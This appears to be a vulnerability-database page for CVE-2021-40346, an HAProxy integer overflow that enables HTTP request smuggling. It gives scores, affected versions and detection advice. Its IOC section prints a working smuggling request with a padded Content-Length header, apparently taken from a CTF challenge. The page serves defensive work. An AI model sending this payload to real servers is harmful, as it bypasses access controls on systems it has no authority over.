cbcvebase.
CVE-2021-40346
published 2021-09-08

CVE-2021-40346: An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker…

PriorityP261high7.5CVSS 3.1
AVNACLPRNUINSUCNIHAN
EPSS
56.08%
98.9th percentile
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.

Affected

13 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
debianhaproxy< haproxy 2.2.16-3 (bookworm)haproxy 2.2.16-3 (bookworm)
fedoraprojectfedora
fedoraprojectfedora
haproxyhaproxy
haproxyhaproxy>= 0 < 2.2.9-2+deb11u22.2.9-2+deb11u2
haproxyhaproxy>= 0 < 2.2.16-32.2.16-3
haproxyhaproxy>= 0 < 2.2.16-32.2.16-3
haproxyhaproxy>= 0 < 2.2.16-32.2.16-3
haproxyhaproxy>= 2.0.0 < 2.0.252.0.25
haproxyhaproxy>= 2.2.0 < 2.2.172.2.17
haproxyhaproxy>= 2.3.0 < 2.3.142.3.14
haproxyhaproxy>= 2.4.0 < 2.4.42.4.4

Detection & IOCsextracted from sources · hover to see the quote

commandContent-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
commandPOST / HTTP/1.1 Host: door-unlocked.chal.intentsummit.org:8000 Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 22 GET /flag HTTP/1.1 h:GET / HTTP/1.1 Host: door-unlocked.chal.intentsummit.org:8000
  • Detect duplicate Content-Length headers in HTTP requests or responses — the exploit relies on injecting a second Content-Length header to smuggle requests past HAProxy ACLs.
  • The attack vector is an oversized/padded Content-Length header name (e.g., 'Content-Length' followed by hundreds of 'a' characters and a colon) used to trigger the integer overflow in htx_add_header, causing HAProxy to accept a second Content-Length and smuggle a request.
  • The vulnerable function is htx_add_header in HAProxy 2.0 through 2.5; monitor for integer overflow conditions in HTTP header name length parsing.
  • The root cause is incorrect handling of HTTP header name length encoding; look for abnormally long header names in HTTP requests as a detection signal.
  • ·Add the following HAProxy ACL rules to block requests/responses with more than one Content-Length header as a mitigation for CVE-2021-40346.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.